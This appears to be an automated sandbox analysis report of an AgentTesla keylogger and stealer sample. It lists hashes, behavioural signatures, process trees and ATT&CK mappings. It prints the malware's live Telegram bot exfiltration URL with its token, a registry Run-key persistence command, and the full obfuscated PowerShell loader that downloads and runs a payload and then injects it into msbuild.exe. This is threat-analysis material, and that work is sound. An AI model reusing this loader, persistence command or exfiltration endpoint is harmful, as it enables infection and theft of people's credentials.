agenttesla | 3852e3e3d446bb7feb8ca29573f2967360624e5a1bb0910dbb3a3e5dd686a948

Analysis

max time kernel
150s
max time network
126s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
21-11-2023 02:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2.vbs
Size

63KB
MD5

d7f4238ff5acac175beb585a26c9cef2
SHA1

d451e565ec848d6fb1e5562c2a50ab4fb06d6a4f
SHA256

816a6f59d836acb9545db79aa246be0be62f43e330c5c93796b1fe2455eab504
SHA512

57bc54e5f52d6d7e780930ba82f5b0f8d72a6cd8ea580430dea73ffe37dec93f1a9ccec70f01d4ced88bc2dac4fcf6e9d920d47708a098f78b119b2eb79c4628
SSDEEP

768:efTBMY0EFQXNaY7jwox9F40IZZKlWD7v/IJRxQzPho+Qz0eNgzTMTH6cmJ:e24Yf/xn40IZZGWDsxKPgzuTMecmJ

Score

10^/10

agenttesla keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

https://api.telegram.org/bot6492548685:AAFSsnUD0WBiVAaUi2pEpecDU82loa1C6EU/

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	1152	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1154728922-3261336865-3456416385-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ticking = "%err1% -w 1 $Stvdrager=(Get-ItemProperty -Path 'HKCU:\\Semperidem\\').illimitedly;%err1% ($Stvdrager)"	msbuild.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1716	msbuild.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1152	powershell.exe
1716	msbuild.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1152 set thread context of 1716	1152	powershell.exe	100

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1152	powershell.exe
1716	msbuild.exe
1716	msbuild.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1152	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1152	powershell.exe
Token: SeDebugPrivilege	1716	msbuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2112 wrote to memory of 1152	2112	WScript.exe	28
PID 2112 wrote to memory of 1152	2112	WScript.exe	28
PID 2112 wrote to memory of 1152	2112	WScript.exe	28
PID 2112 wrote to memory of 1152	2112	WScript.exe	28
PID 1152 wrote to memory of 2976	1152	powershell.exe	30
PID 1152 wrote to memory of 2976	1152	powershell.exe	30
PID 1152 wrote to memory of 2976	1152	powershell.exe	30
PID 1152 wrote to memory of 2976	1152	powershell.exe	30
PID 1152 wrote to memory of 2600	1152	powershell.exe	31
PID 1152 wrote to memory of 2600	1152	powershell.exe	31
PID 1152 wrote to memory of 2600	1152	powershell.exe	31
PID 1152 wrote to memory of 2600	1152	powershell.exe	31
PID 1152 wrote to memory of 2144	1152	powershell.exe	32
PID 1152 wrote to memory of 2144	1152	powershell.exe	32
PID 1152 wrote to memory of 2144	1152	powershell.exe	32
PID 1152 wrote to memory of 2144	1152	powershell.exe	32
PID 1152 wrote to memory of 2712	1152	powershell.exe	33
PID 1152 wrote to memory of 2712	1152	powershell.exe	33
PID 1152 wrote to memory of 2712	1152	powershell.exe	33
PID 1152 wrote to memory of 2712	1152	powershell.exe	33
PID 1152 wrote to memory of 2080	1152	powershell.exe	34
PID 1152 wrote to memory of 2080	1152	powershell.exe	34
PID 1152 wrote to memory of 2080	1152	powershell.exe	34
PID 1152 wrote to memory of 2080	1152	powershell.exe	34
PID 1152 wrote to memory of 2768	1152	powershell.exe	35
PID 1152 wrote to memory of 2768	1152	powershell.exe	35
PID 1152 wrote to memory of 2768	1152	powershell.exe	35
PID 1152 wrote to memory of 2768	1152	powershell.exe	35
PID 1152 wrote to memory of 2912	1152	powershell.exe	36
PID 1152 wrote to memory of 2912	1152	powershell.exe	36
PID 1152 wrote to memory of 2912	1152	powershell.exe	36
PID 1152 wrote to memory of 2912	1152	powershell.exe	36
PID 1152 wrote to memory of 1012	1152	powershell.exe	37
PID 1152 wrote to memory of 1012	1152	powershell.exe	37
PID 1152 wrote to memory of 1012	1152	powershell.exe	37
PID 1152 wrote to memory of 1012	1152	powershell.exe	37
PID 1152 wrote to memory of 2760	1152	powershell.exe	38
PID 1152 wrote to memory of 2760	1152	powershell.exe	38
PID 1152 wrote to memory of 2760	1152	powershell.exe	38
PID 1152 wrote to memory of 2760	1152	powershell.exe	38
PID 1152 wrote to memory of 2200	1152	powershell.exe	39
PID 1152 wrote to memory of 2200	1152	powershell.exe	39
PID 1152 wrote to memory of 2200	1152	powershell.exe	39
PID 1152 wrote to memory of 2200	1152	powershell.exe	39
PID 1152 wrote to memory of 2592	1152	powershell.exe	40
PID 1152 wrote to memory of 2592	1152	powershell.exe	40
PID 1152 wrote to memory of 2592	1152	powershell.exe	40
PID 1152 wrote to memory of 2592	1152	powershell.exe	40
PID 1152 wrote to memory of 2604	1152	powershell.exe	41
PID 1152 wrote to memory of 2604	1152	powershell.exe	41
PID 1152 wrote to memory of 2604	1152	powershell.exe	41
PID 1152 wrote to memory of 2604	1152	powershell.exe	41
PID 1152 wrote to memory of 2624	1152	powershell.exe	42
PID 1152 wrote to memory of 2624	1152	powershell.exe	42
PID 1152 wrote to memory of 2624	1152	powershell.exe	42
PID 1152 wrote to memory of 2624	1152	powershell.exe	42
PID 1152 wrote to memory of 2660	1152	powershell.exe	43
PID 1152 wrote to memory of 2660	1152	powershell.exe	43
PID 1152 wrote to memory of 2660	1152	powershell.exe	43
PID 1152 wrote to memory of 2660	1152	powershell.exe	43
PID 1152 wrote to memory of 2716	1152	powershell.exe	44
PID 1152 wrote to memory of 2716	1152	powershell.exe	44
PID 1152 wrote to memory of 2716	1152	powershell.exe	44
PID 1152 wrote to memory of 2716	1152	powershell.exe	44

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2112
- C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
  "C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" "Function Kokain ([String]$Snyltet){For ($Erhvervsbetonede=7; $Erhvervsbetonede -lt $Snyltet.Length-1){$Tilsnits+=$Snyltet.Substring($Erhvervsbetonede, 1);$Erhvervsbetonede=$Erhvervsbetonede+8;}$Tilsnits;}$Aarvaagenhed=Kokain 'AssociahForsvintcausaestHymnaripQuinism:Splashi/Dobrasf/Semipar1hamburg0Teknolo3derheni. Bolsma1 Bulens7Klukkes6Timorou.Indblst1 Overto1Algebra1Aksiome. Sammen1 Callig6Kommuna3Voteenl/FlotatiKHittendrAbefestocoriacekSonanceu Tylerisanchovye UvurdenTegnflgsSavatio.UndelibfNielavalSportsha Selius ';$Tilsnits01=Kokain 'GaddiudiStrengpeRefreshxBetelso ';$Intercommunal= $Tilsnits01;$Tilsnits00=Kokain 'Ciruela$RapportEekvipernSnowshoc ToothpeMoorcocp MezquihSakralraLsesummlCurricuoHicksitmFurrilye ForkldtSuzyswarfenchoniProtraccDozerfr Klitori=Barless Meterma(MischarNballgoweBrockiswsyntagm-IaniminOSlukninbRabuloujPaasmrie HvastkcSlutdattBrioche LoachaNOmbygniePaprikst Eksplo.ElatrenWGrindaleTongaskbuddanneCBawdstrlKrigsreiTrachileChauvinnKatalogt Ltning)Rokketn. DunsteDderideroFaldnedw SprkkenChokolalUdeslato Femdaga agended hydrioSRomertat DecrysrInthraliFluozirnKabeltog indlan( Blsebl$ImbricaABlinketa ArterirAnsaenovPeamoutaAckgodhaKongepig EndysieRaastofnUnexchahJuleaftePhosphodFiksati)barslej ';.($Tilsnits01) (Kokain 'Hedvinp$alberikc DemaskohjecykenKoordindParatube Sixtypm EmancinOrsellieKreppetd Feezed2Egranul=Begroan$FrkhedeeCatlapanTetgloovHierofa:RaphidiaSnkningpbovestrpRetestid NasophaRidderstWestlanaUnsmili ') ;$condemned2=$condemned2+'\tilkomsten.Fje';. ($Tilsnits01) (Kokain 'Valishi$VidenskTmelodraeLgnsuppkRuttetsn recompiOuttrotkRelakseeVerdensrKreditonpartipoeCircinasBritain= Stanno-GelosinnKasauneoFredsdutSvkkels(SeddelmTSplejsneSnagglesSmaapentStarkye- ObsecrP Rdselsa StimultInertiahMedleve Tillrte$SnderkncGangliioMtaalignnoncorpdMaskinfeDefinitmAutorssnBeadroleSaturdadprecong2Selvris)triarea ') ;if ($Teknikernes) {while ($Encephalometric -eq $Tilsnits3) {& ($Tilsnits01) $Tilsnits00;.($Tilsnits01) (Kokain 'KogerauSTuaregitostraciaPalletsr SpattetRepeals- RoundsSCommunilNedsteme AntiseeBarrerapSandbls Civils5 Revuls ');}& ($Tilsnits01) (Kokain 'SkildriSPhysioge ScotoptUncreos-VelometC WhittaoSanctitnBrachestValbyspePejsestnRibosestabsolve Tilran$GttelegcOmdrejnoHjrejusn Sljfefdapologie horsiemPindensnTykkerte produkdEpiscop2 maksim boserup$ UdelikE UmennenradiotecClockcaeOctoniop BondwohCalimana JundielBerelseoDonisafmTilbydeeQuartertConditirRakkeriiPeriodic Invita ');}& ($Tilsnits01) (Kokain 'Frifind$ SandafEHuldratnConcealcFriholdeReoilsppWhitoveh PraeseaHarmedpl ombresoOverloam rowenaeVipstjrtPhosphorSatineci AtriumcOverens Beundri= Magnet ExplantGGudfrygeGrossettPlenism-SydvestCcolourcoAptenodnHysteretBeholdneKombinenOvogenotTampone Hjemsen$MarcotucDrikoffo RenskrnVelklaedsusannae DagsommPasfotonlevebrdeVideobadCopalif2gennemt ');& ($Tilsnits01) (Kokain 'Apparen$OrdholdVWoyawayiBesideloDeklinelSupervioMalkematDisjointLandhusaErhverv Uddelig=Hachisp Audiome[ VagtseSMagtstiytranspls ammunitGeneraleSkrppenmbedinvo.BrugeruCskriveboSemigirn udtrykvSexisteeForlstervinklertBogsuna]Helbehd:Lucenti:BrevstaFChoisyarsammensoKrestermSulfaquB EksperaCrosiersFremproeFlydhol6 Puerto4LeucocyS Pantnit FestonrRekordtiTallerknsammenrgFiskeek(Eleemos$ ScorpiE Hypoisn UlniercOpstsigeSkatosipVengeunhPhallita retrollSpongoboStopligmhusmndse ArbejdtFonologrImmatchi Passiacflashli)Synthet ');. ($Tilsnits01) (Kokain ' Bravur$JasiesdTEliansviVadefuglAdkomsts NonrevnSkattekienergist Skaanes silvic2Kvikkei Sejremo=Phospha jalousi[SuperfiSBuffoopyKonkavssTofagsvtRattaileJelaagbmAlmoder.OphthalTStrangueEnstemmxAarefort toaste.GrundstEIntercunGotadenc ChampaoAnmiensddronishiPulloven brushngStampub]Syndika: franko:StttevoAfictionSgrumphyCReferenIspaltniIPrincip.FllesanGSiameseeTndstiktBlokfriSKlarhovtCounterrSportziireklamenTrimarggCaturba(Coelast$igjenneVQeethiciUncribboArometel Bortvio CentritDispositExpatiaaChristi)Telefon ');. ($Tilsnits01) (Kokain 'Vimfuln$ HyperaiCurvatinPolystosTyfoideeSifonerkClipsomtPatricigPortrtticompetifTroppentboordly=Unevoka$PakkeliT AngrebiDiscabil ClaesfsParadisnTredjegi Snowbit AndelssMaillec2Minifie.Ledespos SkimmiuTrigonobSubtraksAtavicotNondepar Ridgiei AarbgenAcheatdg Gallsi(Diskuss2Doktrin7 Mellem9metalli6Ingenuo8Maclibl9Vellama,Medbygg9Bstrups0Belbsgr2 Angiot2 fundet)Ferment ');. ($Tilsnits01) $insektgift;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1152
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2604
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2660
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:3056
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2904
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2240
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:268
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:588
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:324
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:764
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:972
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2232
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:3044
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:3004
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 16"
    3⤵
    PID:2280
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
    3⤵
    - Adds Run key to start application
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1152-15-0x0000000002550000-0x0000000002590000-memory.dmp

Filesize
256KB

Download
memory/1152-3-0x0000000073850000-0x0000000073DFB000-memory.dmp

Filesize
5.7MB

Download
memory/1152-16-0x0000000002550000-0x0000000002590000-memory.dmp

Filesize
256KB

Download
memory/1152-5-0x0000000002550000-0x0000000002590000-memory.dmp

Filesize
256KB

Download
memory/1152-6-0x0000000002550000-0x0000000002590000-memory.dmp

Filesize
256KB

Download
memory/1152-9-0x0000000073850000-0x0000000073DFB000-memory.dmp

Filesize
5.7MB

Download
memory/1152-10-0x0000000073850000-0x0000000073DFB000-memory.dmp

Filesize
5.7MB

Download
memory/1152-12-0x0000000002550000-0x0000000002590000-memory.dmp

Filesize
256KB

Download
memory/1152-18-0x0000000076E00000-0x0000000076FA9000-memory.dmp

Filesize
1.7MB

Download
memory/1152-14-0x0000000006270000-0x000000000ADB4000-memory.dmp

Filesize
75.3MB

Download
memory/1152-2-0x0000000073850000-0x0000000073DFB000-memory.dmp

Filesize
5.7MB

Download
memory/1152-4-0x0000000002550000-0x0000000002590000-memory.dmp

Filesize
256KB

Download
memory/1152-13-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/1152-19-0x0000000076FF0000-0x00000000770C6000-memory.dmp

Filesize
856KB

Download
memory/1152-23-0x0000000073850000-0x0000000073DFB000-memory.dmp

Filesize
5.7MB

Download
memory/1716-21-0x000000006F2B0000-0x0000000070312000-memory.dmp

Filesize
16.4MB

Download
memory/1716-22-0x0000000000FF0000-0x0000000005B34000-memory.dmp

Filesize
75.3MB

Download
memory/1716-20-0x0000000076E00000-0x0000000076FA9000-memory.dmp

Filesize
1.7MB

Download
memory/1716-24-0x000000006F2B0000-0x000000006F2F0000-memory.dmp

Filesize
256KB

Download
memory/1716-25-0x000000006EAD0000-0x000000006F1BE000-memory.dmp

Filesize
6.9MB

Download
memory/1716-27-0x0000000076E00000-0x0000000076FA9000-memory.dmp

Filesize
1.7MB

Download
memory/1716-30-0x000000006EAD0000-0x000000006F1BE000-memory.dmp

Filesize
6.9MB

Download